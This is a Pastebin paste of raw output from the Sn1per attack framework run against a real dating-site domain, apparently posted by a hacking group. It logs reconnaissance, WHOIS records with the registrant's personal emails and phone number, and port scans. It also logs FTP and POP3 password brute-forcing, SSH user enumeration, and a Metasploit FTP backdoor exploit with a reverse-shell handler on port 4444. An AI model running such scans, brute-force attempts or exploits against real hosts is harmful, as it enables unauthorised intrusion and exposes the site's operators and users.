Advertisement
Guest User

HunterUnit JTSEC amourangels.info full scan #1

a guest
Sep 26th, 2017
1,073
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 45.84 KB | None | 0 0
  1.  + -- --=[Sn1per v2.8 is available to download... To update, type "sniper update" 
  2.  ____ 
  3.  _________ / _/___ ___ _____
  4.  / ___/ __ \ / // __ \/ _ \/ ___/
  5.  (__ ) / / // // /_/ / __/ / 
  6.  /____/_/ /_/___/ .___/\___/_/ 
  7.  /_/ 
  8. 
  9.  + -- --=[http://crowdshield.com
  10.  + -- --=[sniper v2.7 by 1N3
  11. 
  12.  + -- ----------------------------=[Running Nslookup]=------------------------ -- +
  13. Server: 192.168.1.254
  14. Address: 192.168.1.254#53
  15.  
  16. Non-authoritative answer:
  17. Name: amourangels.info
  18. Address: 104.140.246.148
  19.  
  20. amourangels.info has address 104.140.246.148
  21. amourangels.info mail is handled by 0 amourangels.info.
  22.  + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
  23.  
  24. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  25.  
  26. [+] Target is amourangels.info
  27. [+] Loading modules.
  28. [+] Following modules are loaded:
  29. [x] [1] ping:icmp_ping - ICMP echo discovery module
  30. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  31. [x] [3] ping:udp_ping - UDP-based ping discovery module
  32. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  33. [x] [5] infogather:portscan - TCP and UDP PortScanner
  34. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  35. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  36. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  37. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  38. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  39. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  40. [x] [12] fingerprint:smb - SMB fingerprinting module
  41. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  42. [+] 13 modules registered
  43. [+] Initializing scan engine
  44. [+] Running scan engine
  45. [-] ping:tcp_ping module: no closed/open TCP ports known on 104.140.246.148. Module test failed
  46. [-] ping:udp_ping module: no closed/open UDP ports known on 104.140.246.148. Module test failed
  47. [-] No distance calculation. 104.140.246.148 appears to be dead or no ports known
  48. [+] Host: 104.140.246.148 is up (Guess probability: 50%)
  49. [+] Target: 104.140.246.148 is alive. Round-Trip Time: 1.01964 sec
  50. [+] Selected safe Round-Trip Time value is: 2.03928 sec
  51. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
  52. [-] fingerprint:smb need either TCP port 139 or 445 to run
  53. [+] Primary guess:
  54. [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
  55. [+] Other guesses:
  56. [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
  57. [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
  58. [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
  59. [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
  60. [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
  61. [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
  62. [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
  63. [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
  64. [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
  65. [+] Cleaning up scan engine
  66. [+] Modules deinitialized
  67. [+] Execution completed.
  68.  + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
  69. Domain Name: AMOURANGELS.INFO
  70. Registry Domain ID: D53470519-LRMS
  71. Registrar WHOIS Server:
  72. Registrar URL: http://www.CrazyDomains.com
  73. Updated Date: 2017-09-20T21:10:20Z
  74. Creation Date: 2014-09-08T12:30:01Z
  75. Registry Expiry Date: 2019-09-08T12:30:01Z
  76. Registrar Registration Expiration Date:
  77. Registrar: Crazy Domains FZ-LLC
  78. Registrar IANA ID: 1291
  79. Registrar Abuse Contact Email:
  80. Registrar Abuse Contact Phone:
  81. Reseller:
  82. Domain Status: ok https://icann.org/epp#ok
  83. Registry Registrant ID: C154844480-LRMS
  84. Registrant Name: Kam Media
  85. Registrant Organization:
  86. Registrant Street: 20 Boulevard
  87. Registrant City: Paris
  88. Registrant State/Province: Paris
  89. Registrant Postal Code: 75012
  90. Registrant Country: FR
  91. Registrant Phone: +33.327723445
  92. Registrant Phone Ext:
  93. Registrant Fax:
  94. Registrant Fax Ext:
  95. Registrant Email: yanmas@techie.com
  96. Registry Admin ID: C154844478-LRMS
  97. Admin Name: Kam Media
  98. Admin Organization:
  99. Admin Street: 20 Boulevard
  100. Admin City: Paris
  101. Admin State/Province: Paris
  102. Admin Postal Code: 75012
  103. Admin Country: FR
  104. Admin Phone: +33.327723445
  105. Admin Phone Ext:
  106. Admin Fax:
  107. Admin Fax Ext:
  108. Admin Email: kammedic@hotmail.com
  109. Registry Tech ID: C154844478-LRMS
  110. Tech Name: Kam Media
  111. Tech Organization:
  112. Tech Street: 20 Boulevard
  113. Tech City: Paris
  114. Tech State/Province: Paris
  115. Tech Postal Code: 75012
  116. Tech Country: FR
  117. Tech Phone: +33.327723445
  118. Tech Phone Ext:
  119. Tech Fax:
  120. Tech Fax Ext:
  121. Tech Email: kammedic@hotmail.com
  122. Registry Billing ID: C154844478-LRMS
  123. Billing Name: Kam Media
  124. Billing Organization:
  125. Billing Street: 20 Boulevard
  126. Billing City: Paris
  127. Billing State/Province: Paris
  128. Billing Postal Code: 75012
  129. Billing Country: FR
  130. Billing Phone: +33.327723445
  131. Billing Phone Ext:
  132. Billing Fax:
  133. Billing Fax Ext:
  134. Billing Email: kammedic@hotmail.com
  135. Name Server: NS1.SMILESERVE.COM
  136. Name Server: NS2.SMILESERVE.COM
  137. DNSSEC: unsigned
  138. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  139. >>> Last update of WHOIS database: 2017-09-26T21:29:31Z <<<
  140.  
  141. For more information on Whois status codes, please visit https://icann.org/epp
  142.  
  143. Access to AFILIAS WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Afilias registry database. The data in this record is provided by Afilias Limited for informational purposes only, and Afilias does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to(a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Afilias reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
  144.  + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
  145.  
  146. *******************************************************************
  147. * *
  148. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
  149. * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
  150. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
  151. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
  152. * *
  153. * TheHarvester Ver. 2.7 *
  154. * Coded by Christian Martorella *
  155. * Edge-Security Research *
  156. * cmartorella@edge-security.com *
  157. *******************************************************************
  158.  
  159.  
  160. [-] Searching in Bing:
  161.  + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
  162.  
  163. ; <<>> DiG 9.10.3-P4-Debian <<>> -x amourangels.info
  164. ;; global options: +cmd
  165. ;; Got answer:
  166. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 62196
  167. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  168.  
  169. ;; OPT PSEUDOSECTION:
  170. ; EDNS: version: 0, flags:; udp: 4096
  171. ;; QUESTION SECTION:
  172. ;info.amourangels.in-addr.arpa. IN PTR
  173.  
  174. ;; AUTHORITY SECTION:
  175. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017043180 1800 900 604800 3600
  176.  
  177. ;; Query time: 37 msec
  178. ;; SERVER: 192.168.1.254#53(192.168.1.254)
  179. ;; WHEN: Tue Sep 26 17:30:33 EDT 2017
  180. ;; MSG SIZE rcvd: 126
  181.  
  182. dnsenum VERSION:1.2.4
  183. 
  184. ----- amourangels.info -----
  185. 
  186.  
  187. Host's addresses:
  188. __________________
  189.  
  190. amourangels.info. 14234 IN A 104.140.246.148
  191. 
  192.  
  193. Name Servers:
  194. ______________
  195.  
  196. ns2.smileserve.com. 14234 IN A 104.140.246.148
  197. ns1.smileserve.com. 14234 IN A 104.140.246.148
  198. 
  199.  
  200. Mail (MX) Servers:
  201. ___________________
  202.  
  203. amourangels.info. 14234 IN A 104.140.246.148
  204. 
  205.  
  206. Trying Zone Transfers and getting Bind Versions:
  207. _________________________________________________
  208.  
  209. 
  210. Trying Zone Transfer for amourangels.info on ns2.smileserve.com ...
  211.  
  212. Trying Zone Transfer for amourangels.info on ns1.smileserve.com ...
  213.  
  214. brute force file not specified, bay.
  215.  + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
  216. 
  217. ____ _ _ _ _ _____
  218. / ___| _ _| |__ | (_)___| |_|___ / _ __
  219. \___ \| | | | '_ \| | / __| __| |_ \| '__|
  220. ___) | |_| | |_) | | \__ \ |_ ___) | |
  221. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
  222.  
  223. # Coded By Ahmed Aboul-Ela - @aboul3la
  224.  
  225. [-] Enumerating subdomains now for amourangels.info
  226. [-] verbosity is enabled, will show the subdomains results in realtime
  227. [-] Searching now in Baidu..
  228. [-] Searching now in Yahoo..
  229. [-] Searching now in Google..
  230. [-] Searching now in Bing..
  231. [-] Searching now in Ask..
  232. [-] Searching now in Netcraft..
  233. [-] Searching now in DNSdumpster..
  234. [-] Searching now in Virustotal..
  235. [-] Searching now in ThreatCrowd..
  236. [-] Searching now in SSL Certificates..
  237. [-] Searching now in PassiveDNS..
  238. SSL Certificates: cpanel.amourangels.info
  239. SSL Certificates: mail.amourangels.info
  240. SSL Certificates: webdisk.amourangels.info
  241. SSL Certificates: webmail.amourangels.info
  242. SSL Certificates: www.amourangels.info
  243. Virustotal: www.amourangels.info
  244. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-amourangels.info.txt
  245. [-] Total Unique Subdomains Found: 5
  246. www.amourangels.info
  247. cpanel.amourangels.info
  248. mail.amourangels.info
  249. webdisk.amourangels.info
  250. webmail.amourangels.info
  251.  
  252.  ╔═╗╦═╗╔╦╗╔═╗╦ ╦
  253.  ║ ╠╦╝ ║ ╚═╗╠═╣
  254.  ╚═╝╩╚═ ╩o╚═╝╩ ╩
  255.  + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
  256. 
  257. *.amourangels.info
  258. cpanel.amourangels.info
  259. mail.amourangels.info
  260. webdisk.amourangels.info
  261. webmail.amourangels.info
  262. www.amourangels.info
  263.  [+] Domains saved to: /usr/share/sniper/loot/domains/domains-amourangels.info-full.txt
  264. 
  265.  + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
  266.  + -- ----------------------------=[Checking Email Security]=----------------- -- +
  267.  
  268.  + -- ----------------------------=[Pinging host]=---------------------------- -- +
  269. PING amourangels.info (104.140.246.148) 56(84) bytes of data.
  270. 64 bytes from ns1.dating-club2007.club (104.140.246.148): icmp_seq=1 ttl=53 time=180 ms
  271.  
  272. --- amourangels.info ping statistics ---
  273. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  274. rtt min/avg/max/mdev = 180.089/180.089/180.089/0.000 ms
  275.  
  276.  + -- ----------------------------=[Running TCP port scan]=------------------- -- +
  277.  
  278. Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-26 17:31 EDT
  279. Nmap scan report for amourangels.info (104.140.246.148)
  280. Host is up (2.1s latency).
  281. rDNS record for 104.140.246.148: ns1.dating-club2007.club
  282. Not shown: 43 filtered ports, 1 closed port
  283. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  284. PORT STATE SERVICE
  285. 21/tcp open ftp
  286. 22/tcp open ssh
  287. 110/tcp open pop3
  288. 443/tcp open https
  289. 3306/tcp open mysql
  290.  
  291. Nmap done: 1 IP address (1 host up) scanned in 3.23 seconds
  292.  
  293.  + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
  294.  + -- --=[Port 21 opened... running tests...
  295.  
  296. Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-26 17:31 EDT
  297. Nmap scan report for amourangels.info (104.140.246.148)
  298. Host is up (0.28s latency).
  299. rDNS record for 104.140.246.148: ns1.dating-club2007.club
  300.  
  301. PORT STATE SERVICE VERSION
  302. 21/tcp open ftp Pure-FTPd
  303. | ftp-brute:
  304. | Accounts: No valid accounts found
  305. |_ Statistics: Performed 2397 guesses in 184 seconds, average tps: 13.9
  306. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  307. Device type: general purpose
  308. Running: Linux 2.6.X
  309. OS CPE: cpe:/o:linux:linux_kernel:2.6.39
  310. OS details: Linux 2.6.39
  311. Network Distance: 20 hops
  312.  
  313. TRACEROUTE (using port 21/tcp)
  314. HOP RTT ADDRESS
  315. 1 272.47 ms 10.13.0.1
  316. 2 276.93 ms 37.187.24.252
  317. 3 280.41 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
  318. 4 ...
  319. 5 299.36 ms be100-1107.ldn-1-a9.uk.eu (91.121.215.179)
  320. 6 284.72 ms ge-3-3-0.mpr1.lhr3.uk.above.net (195.66.236.76)
  321. 7 305.08 ms ae6.mpr3.lhr3.uk.zip.zayo.com (64.125.21.21)
  322. 8 288.38 ms ae12.mpr2.lhr2.uk.zip.zayo.com (64.125.28.21)
  323. 9 341.60 ms ae27.cs1.lhr11.uk.eth.zayo.com (64.125.30.236)
  324. 10 352.35 ms ae5.cs1.lga5.us.eth.zayo.com (64.125.29.126)
  325. 11 180.89 ms ae27.cr1.lga5.us.zip.zayo.com (64.125.30.251)
  326. 12 186.10 ms ae1.cr2.lga5.us.zip.zayo.com (64.125.29.38)
  327. 13 196.49 ms ae10.mpr4.lga7.us.zip.zayo.com (64.125.20.81)
  328. 14 193.16 ms ae1.mpr2.lga7.us.zip.zayo.com (64.125.20.125)
  329. 15 189.62 ms 64.124.193.85.IPYX-076763-001-ZYO.above.net (64.124.193.85)
  330. 16 191.75 ms cs49.cs30.jfk.nyinternet.net (64.147.125.190)
  331. 17 183.31 ms 66.111.3.30.static.nyinternet.net (66.111.3.30)
  332. 18 182.30 ms xe-0-1-0.nyc1-100.nyc1.serverhub.com (104.140.200.33)
  333. 19 180.11 ms exponentiation.approvalbureau.com (104.140.201.114)
  334. 20 180.26 ms ns1.dating-club2007.club (104.140.246.148)
  335.  
  336. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  337. Nmap done: 1 IP address (1 host up) scanned in 198.39 seconds
  338. 
  339. ______________________________________________________________________________
  340. | |
  341. | METASPLOIT CYBER MISSILE COMMAND V4 |
  342. |______________________________________________________________________________|
  343. \ / /
  344. \ . / / x
  345. \ / /
  346. \ / + /
  347. \ + / /
  348. * / /
  349. / . /
  350. X / / X
  351. / ###
  352. / # % #
  353. / ###
  354. . /
  355. . / . * .
  356. /
  357. *
  358. + *
  359.  
  360. ^
  361. #### __ __ __ ####### __ __ __ ####
  362. #### / \ / \ / \ ########### / \ / \ / \ ####
  363. ################################################################################
  364. ################################################################################
  365. # WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
  366. ################################################################################
  367. https://metasploit.com
  368. 
  369.  
  370. =[ metasploit v4.16.8-dev ]
  371. + -- --=[ 1684 exploits - 964 auxiliary - 299 post ]
  372. + -- --=[ 498 payloads - 40 encoders - 10 nops ]
  373. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  374.  
  375. [*] Processing /root/.msf4/msfconsole.rc for ERB directives.
  376. resource (/root/.msf4/msfconsole.rc)> “spool /root/msf_console.log”
  377. [-] Unknown command: “spool.
  378. RHOST => amourangels.info
  379. RHOSTS => amourangels.info
  380. [*] amourangels.info:21 - Banner: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  381. 220-You are user number 1 of 50 allowed.
  382. 220-Local time is now 17:34. Server port: 21.
  383. 220-This is a private system - No anonymous login
  384. 220-IPv6 connections are also welcome on this server.
  385. 220 You will be disconnected after 15 minutes of inactivity.
  386. [*] amourangels.info:21 - USER: 331 User X:) OK. Password required
  387. [*] Exploit completed, but no session was created.
  388. [*] Started reverse TCP double handler on 10.13.0.222:4444
  389. [*] amourangels.info:21 - Sending Backdoor Command
  390. [*] Exploit completed, but no session was created.
  391.  + -- --=[Port 22 opened... running tests...
  392. [exception] did not receive banner.
  393.  
  394. Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-26 17:34 EDT
  395. Nmap scan report for amourangels.info (104.140.246.148)
  396. Host is up (0.18s latency).
  397. rDNS record for 104.140.246.148: ns1.dating-club2007.club
  398.  
  399. PORT STATE SERVICE VERSION
  400. 22/tcp filtered ssh
  401. Too many fingerprints match this host to give specific OS details
  402. Network Distance: 20 hops
  403.  
  404. TRACEROUTE (using proto 1/icmp)
  405. HOP RTT ADDRESS
  406. 1 110.99 ms 10.13.0.1
  407. 2 111.63 ms 37.187.24.252
  408. 3 111.61 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
  409. 4 113.37 ms 10.95.33.8
  410. 5 114.60 ms be100-1107.ldn-1-a9.uk.eu (91.121.215.179)
  411. 6 115.16 ms ge-3-3-0.mpr1.lhr3.uk.above.net (195.66.236.76)
  412. 7 115.20 ms ae6.mpr3.lhr3.uk.zip.zayo.com (64.125.21.21)
  413. 8 114.66 ms ae12.mpr2.lhr2.uk.zip.zayo.com (64.125.28.21)
  414. 9 181.90 ms ae27.cs1.lhr11.uk.eth.zayo.com (64.125.30.236)
  415. 10 181.46 ms ae5.cs1.lga5.us.eth.zayo.com (64.125.29.126)
  416. 11 180.87 ms ae27.cr1.lga5.us.zip.zayo.com (64.125.30.251)
  417. 12 181.68 ms ae1.cr2.lga5.us.zip.zayo.com (64.125.29.38)
  418. 13 ...
  419. 14 181.69 ms ae1.mpr2.lga7.us.zip.zayo.com (64.125.20.125)
  420. 15 180.34 ms 64.124.193.85.IPYX-076763-001-ZYO.above.net (64.124.193.85)
  421. 16 180.36 ms cs49.cs30.jfk.nyinternet.net (64.147.125.190)
  422. 17 192.04 ms 66.111.3.30.static.nyinternet.net (66.111.3.30)
  423. 18 183.32 ms xe-0-1-0.nyc1-100.nyc1.serverhub.com (104.140.200.33)
  424. 19 179.78 ms exponentiation.approvalbureau.com (104.140.201.114)
  425. 20 180.73 ms ns1.dating-club2007.club (104.140.246.148)
  426.  
  427. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  428. Nmap done: 1 IP address (1 host up) scanned in 13.46 seconds
  429. 
  430. . .
  431. .
  432.  
  433. dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o
  434.  ' dB' BBP
  435. dB'dB'dB' dBBP dBP dBP BB
  436. dB'dB'dB' dBP dBP dBP BB
  437. dB'dB'dB' dBBBBP dBP dBBBBBBB
  438.  
  439. dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP
  440. . . dB' dBP dB'.BP
  441. | dBP dBBBB' dBP dB'.BP dBP dBP
  442. --o-- dBP dBP dBP dB'.BP dBP dBP
  443. | dBBBBP dBP dBBBBP dBBBBP dBP dBP
  444.  
  445. .
  446. .
  447. o To boldly go where no
  448. shell has gone before
  449. 
  450.  
  451. =[ metasploit v4.16.8-dev ]
  452. + -- --=[ 1684 exploits - 964 auxiliary - 299 post ]
  453. + -- --=[ 498 payloads - 40 encoders - 10 nops ]
  454. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  455.  
  456. [*] Processing /root/.msf4/msfconsole.rc for ERB directives.
  457. resource (/root/.msf4/msfconsole.rc)> “spool /root/msf_console.log”
  458. [-] Unknown command: “spool.
  459. USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
  460. RHOSTS => amourangels.info
  461. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
  462. RHOST => amourangels.info
  463. [*] 104.140.246.148:22 - SSH - Checking for false positives
  464. [-] 104.140.246.148:22 - SSH - throws false positive results. Aborting.
  465. [*] Scanned 1 of 1 hosts (100% complete)
  466. [*] Auxiliary module execution completed
  467. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: KEY_FILE.
  468. [+] 104.140.246.148:22 - SSH server version: SSH-2.0-OpenSSH_7.4 ( service.version=7.4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.protocol=ssh fingerprint_db=ssh.banner )
  469. [*] amourangels.info:22 - Scanned 1 of 1 hosts (100% complete)
  470. [*] Auxiliary module execution completed
  471.  + -- --=[Port 23 closed... skipping.
  472.  + -- --=[Port 25 closed... skipping.
  473.  + -- --=[Port 53 closed... skipping.
  474.  + -- --=[Port 79 closed... skipping.
  475.  + -- --=[Port 80 closed... skipping.
  476.  + -- --=[Port 110 opened... running tests...
  477.  
  478. Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-26 17:35 EDT
  479. Nmap scan report for amourangels.info (104.140.246.148)
  480. Host is up (0.18s latency).
  481. rDNS record for 104.140.246.148: ns1.dating-club2007.club
  482.  
  483. PORT STATE SERVICE VERSION
  484. 110/tcp open pop3 Dovecot pop3d
  485. | pop3-brute:
  486. | Accounts: No valid accounts found
  487. |_ Statistics: Performed 185 guesses in 195 seconds, average tps: 0.9
  488. |_pop3-capabilities: STLS AUTH-RESP-CODE RESP-CODES PIPELINING USER TOP SASL(PLAIN LOGIN) UIDL CAPA
  489. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  490. Device type: general purpose
  491. Running: Linux 2.6.X
  492. OS CPE: cpe:/o:linux:linux_kernel:2.6.39
  493. OS details: Linux 2.6.39
  494. Network Distance: 20 hops
  495.  
  496. TRACEROUTE (using port 110/tcp)
  497. HOP RTT ADDRESS
  498. 1 522.26 ms 10.13.0.1
  499. 2 530.92 ms 37.187.24.252
  500. 3 526.46 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
  501. 4 ...
  502. 5 537.91 ms be100-1107.ldn-1-a9.uk.eu (91.121.215.179)
  503. 6 534.41 ms ge-3-3-0.mpr1.lhr3.uk.above.net (195.66.236.76)
  504. 7 544.14 ms ae6.mpr3.lhr3.uk.zip.zayo.com (64.125.21.21)
  505. 8 554.41 ms ae12.mpr2.lhr2.uk.zip.zayo.com (64.125.28.21)
  506. 9 768.91 ms ae27.cs1.lhr11.uk.eth.zayo.com (64.125.30.236)
  507. 10 779.44 ms ae5.cs1.lga5.us.eth.zayo.com (64.125.29.126)
  508. 11 478.92 ms ae27.cr1.lga5.us.zip.zayo.com (64.125.30.251)
  509. 12 486.24 ms ae1.cr2.lga5.us.zip.zayo.com (64.125.29.38)
  510. 13 482.45 ms ae10.mpr4.lga7.us.zip.zayo.com (64.125.20.81)
  511. 14 509.85 ms ae1.mpr2.lga7.us.zip.zayo.com (64.125.20.125)
  512. 15 509.78 ms 64.124.193.85.IPYX-076763-001-ZYO.above.net (64.124.193.85)
  513. 16 499.68 ms cs49.cs30.jfk.nyinternet.net (64.147.125.190)
  514. 17 489.53 ms 66.111.3.30.static.nyinternet.net (66.111.3.30)
  515. 18 277.03 ms xe-0-1-0.nyc1-100.nyc1.serverhub.com (104.140.200.33)
  516. 19 266.90 ms exponentiation.approvalbureau.com (104.140.201.114)
  517. 20 180.03 ms ns1.dating-club2007.club (104.140.246.148)
  518.  
  519. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  520. Nmap done: 1 IP address (1 host up) scanned in 208.72 seconds
  521.  + -- --=[Port 111 closed... skipping.
  522.  + -- --=[Port 135 closed... skipping.
  523.  + -- --=[Port 139 closed... skipping.
  524.  + -- --=[Port 161 closed... skipping.
  525.  + -- --=[Port 162 closed... skipping.
  526.  + -- --=[Port 389 closed... skipping.
  527.  + -- --=[Port 443 opened... running tests...
  528.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  529.  
  530. ^ ^
  531. _ __ _ ____ _ __ _ _ ____
  532. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  533. | V V // o // _/ | V V // 0 // 0 // _/
  534. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  535. <
  536. ...'
  537.  
  538. WAFW00F - Web Application Firewall Detection Tool
  539.  
  540. By Sandro Gauci && Wendel G. Henrique
  541.  
  542. Checking https://amourangels.info
  543. Generic Detection results:
  544. No WAF detected by the generic detection
  545. Number of requests: 13
  546.  
  547.  + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
  548. ____ _ _ _____ _ _
  549. / ___| | ___ _ _ __| | ___|_ _(_) |
  550. | | | |/ _ \| | | |/ _` | |_ / _` | | |
  551. | |___| | (_) | |_| | (_| | _| (_| | | |
  552. \____|_|\___/ \__,_|\__,_|_| \__,_|_|_|
  553. v1.0.1 by m0rtem
  554.  
  555.  
  556. [17:39:52] Initializing CloudFail - the date is: 26/09/2017
  557. [17:39:52] Fetching initial information from: amourangels.info...
  558. [17:39:52] Server IP: 104.140.246.148
  559. [17:39:52] Testing if amourangels.info is on the Cloudflare network...
  560. [17:39:52] amourangels.info is not part of the Cloudflare network, quitting...
  561.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  562. https://amourangels.info [200 OK] Country[UNITED STATES][US], HTTPServer[LiteSpeed], IP[104.140.246.148], LiteSpeed, Script[text/javascript], Title[Amour Angels], UncommonHeaders[alt-svc]
  563.  
  564.  + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
  565.  
  566.  
  567.  
  568. AVAILABLE PLUGINS
  569. -----------------
  570.  
  571. PluginSessionResumption
  572. PluginOpenSSLCipherSuites
  573. PluginCertInfo
  574. PluginHSTS
  575. PluginHeartbleed
  576. PluginCompression
  577. PluginChromeSha1Deprecation
  578. PluginSessionRenegotiation
  579.  
  580.  
  581.  
  582. CHECKING HOST(S) AVAILABILITY
  583. -----------------------------
  584.  
  585. amourangels.info:443 => 104.140.246.148:443
  586.  
  587.  
  588.  
  589. SCAN RESULTS FOR AMOURANGELS.INFO:443 - 104.140.246.148:443
  590. -----------------------------------------------------------
  591.  
  592. * Deflate Compression:
  593. OK - Compression disabled
  594.  
  595. * Session Renegotiation:
  596. Client-initiated Renegotiations: OK - Rejected
  597. Secure Renegotiation: OK - Supported
  598.  
  599. * SSLV3 Cipher Suites:
  600. Server rejected all cipher suites.
  601.  
  602. * SSLV2 Cipher Suites:
  603. Server rejected all cipher suites.
  604.  
  605. * Certificate - Content:
  606. SHA1 Fingerprint: aede924f1243327142e7b33ad2f03010b9390d4c
  607. Common Name: amourangels.info
  608. Issuer: cPanel, Inc. Certification Authority
  609. Serial Number: 488B5892E01C2B2457CD629A118352AD
  610. Not Before: Sep 21 00:00:00 2017 GMT
  611. Not After: Dec 20 23:59:59 2017 GMT
  612. Signature Algorithm: sha256WithRSAEncryption
  613. Public Key Algorithm: rsaEncryption
  614. Key Size: 2048 bit
  615. Exponent: 65537 (0x10001)
  616. X509v3 Subject Alternative Name: {'DNS': ['amourangels.info', 'autodiscover.amourangels.info', 'cpanel.amourangels.info', 'mail.amourangels.info', 'webdisk.amourangels.info', 'webmail.amourangels.info', 'www.amourangels.info']}
  617.  
  618. * Certificate - Trust:
  619. Hostname Validation: OK - Subject Alternative Name matches
  620. Google CA Store (09/2015): OK - Certificate is trusted
  621. Java 6 CA Store (Update 65): OK - Certificate is trusted
  622. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  623. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  624. Microsoft CA Store (09/2015): ERROR: timeout - timed out
  625. Certificate Chain Received: ['amourangels.info', 'cPanel, Inc. Certification Authority', 'COMODO RSA Certification Authority']
  626.  
  627. * Certificate - OCSP Stapling:
  628. OCSP Response Status: successful
  629. Validation w/ Mozilla's CA Store: OK - Response is trusted
  630. Responder Id: 7E035A65416BA77E0AE1B89D08EA1D8E1D6AC765
  631. Cert Status: good
  632. Cert Serial Number: 488B5892E01C2B2457CD629A118352AD
  633. This Update: Sep 25 17:45:04 2017 GMT
  634. Next Update: Oct 2 17:45:04 2017 GMT
  635.  
  636. * Session Resumption:
  637. With Session IDs: PARTIALLY SUPPORTED (4 successful, 0 failed, 1 errors, 5 total attempts). Try --resum_rate.
  638. ERROR #1: timeout - timed out
  639. With TLS Session Tickets: NOT SUPPORTED - TLS ticket not assigned.
  640.  
  641.  
  642.  
  643. SCAN COMPLETED IN 30.28 S
  644. -------------------------
  645. Version: 1.11.10-static
  646. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  647. 
  648. Testing SSL server amourangels.info on port 443 using SNI name amourangels.info
  649.  
  650. TLS Fallback SCSV:
  651. Server does not support TLS Fallback SCSV
  652.  
  653. TLS renegotiation:
  654. Secure session renegotiation supported
  655.  
  656. TLS Compression:
  657. Compression disabled
  658.  
  659. Heartbleed:
  660. TLS 1.2 not vulnerable to heartbleed
  661. TLS 1.1 not vulnerable to heartbleed
  662. TLS 1.0 not vulnerable to heartbleed
  663.  
